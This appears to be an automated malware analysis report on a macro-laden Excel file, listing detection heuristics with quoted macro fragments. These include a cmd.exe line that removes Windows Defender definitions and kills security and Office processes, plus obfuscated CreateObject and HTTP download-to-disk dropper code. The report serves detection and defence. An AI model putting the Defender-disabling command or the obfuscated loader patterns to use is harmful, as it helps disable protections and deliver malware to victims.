Malicious Office (OOXML) — malware analysis report

Heuristics 10

• ClamAV: Xls.Malware.Generic-6834349-0 critical CLAMAV_DETECTION
  ClamAV detected this file as malware: Xls.Malware.Generic-6834349-0
• VBA project inside OOXML medium 8 related findings OOXML_VBA
  Document contains a VBA project — VBA macros present
• WScript.Shell usage critical OLE_VBA_WSCRIPT
  WScript.Shell usage
  Matched line in script

  Set defender = CreateObject("WScript.Shell")

• VBA character-shift decoded Shell command critical OLE_VBA_ASC_CHR_SHIFT_SHELL
  VBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
  Matched line in script

      For uqoX2UDmG = 1 To Len(mPObOBmc0)

• VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
  VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script

  stream_obj.write http_obj.responseBody

• Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script

  Set http_obj = CreateObject(YDj0bF3tV(StrReverse(xBLQn36ZJ("[WO[TS5_m{zvyvpjT")), StrReverse(xBLQn36ZJ("7"))))

• CreateObject call high OLE_VBA_CREATEOBJ
  CreateObject call
  Matched line in script

  Set http_obj = CreateObject(YDj0bF3tV(StrReverse(xBLQn36ZJ("[WO[TS5_m{zvyvpjT")), StrReverse(xBLQn36ZJ("7"))))

• cmd.exe reference in VBA high OLE_VBA_CMD
  cmd.exe reference in VBA
  Matched line in script

  Start = "cmd.exe /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & taskkill /f /im MSASCuiL.exe & taskkill /f /im MpCmdRun.exe & exit"

• VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
• Workbook_Open macro low OLE_VBA_WBOPEN
  Workbook_Open macro
  Matched line in script

  Private Sub Workbook_Open()

Open this report in the interactive analyzer, or submit your own file for analysis.